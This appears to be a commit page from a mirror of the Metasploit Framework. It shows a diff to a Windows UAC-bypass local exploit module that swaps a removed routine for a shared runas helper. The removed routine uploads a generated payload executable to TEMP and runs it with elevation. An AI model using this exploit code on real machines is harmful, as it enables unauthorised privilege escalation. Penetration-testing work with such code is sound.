infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Fall back to runas if UAC disabled

bug/bundler_fix
Meatballs 2015-01-08 11:07:57 +00:00
parent 8f720ef766
commit a9fee9c022
No known key found for this signature in database
GPG Key ID: 5380EAF01F2F8B38
1 changed files with 6 additions and 19 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

25
modules/exploits/windows/local/bypassuac_injection.rb
View File

@ -14,6 +14,7 @@ class Metasploit3 < Msf::Exploit::Local
include Post::File
include Post::Windows::Priv
include Post::Windows::ReflectiveDLLInjection
include Post::Windows::Runas
def initialize(info={})
super( update_info( info,
@ -33,7 +34,9 @@ class Metasploit3 < Msf::Exploit::Local
'David Kennedy "ReL1K" <kennedyd013[at]gmail.com>',
'mitnick',
'mubix', # Port to local exploit
'Ben Campbell' # In memory technique
'Ben Campbell', # In memory technique
'Lesage', # Win8+ updates
'OJ Reeves' # Win 8+ updates
],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ],
@ -76,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Local
print_good('BypassUAC can bypass this setting, continuing...')
when UAC_NO_PROMPT
print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
runas_method(env_vars['TEMP'])
shell_execute_exe
return
end
@ -142,20 +145,6 @@ class Metasploit3 < Msf::Exploit::Local
end
end
def runas_method(temp_dir)
payload = generate_payload_exe
payload_filename = Rex::Text.rand_text_alpha((rand(8) + 6)) + '.exe'
temp_exe = "#{temp_dir}\\#{payload_filename}"
print_status("Uploading payload: #{temp_exe}")
write_file(temp_exe, payload)
register_file_for_cleanup(temp_exe)
print_status("Executing payload: #{temp_exe}")
session.railgun.shell32.ShellExecuteA(nil, 'runas', temp_exe, nil, nil, 5)
print_status('Payload executed.')
end
def run_injection(pid, dll_path, file_paths)
vprint_status("Injecting #{datastore['DLL_PATH']} into process ID #{pid}")
begin
@ -226,9 +215,7 @@ class Metasploit3 < Msf::Exploit::Local
if is_uac_enabled?
print_status('UAC is Enabled, checking level...')
else
if is_in_admin_group?
fail_with(Exploit::Failure::Unknown, 'UAC is disabled and we are in the admin group so something has gone wrong...')
else
unless is_in_admin_group?
fail_with(Exploit::Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
end
end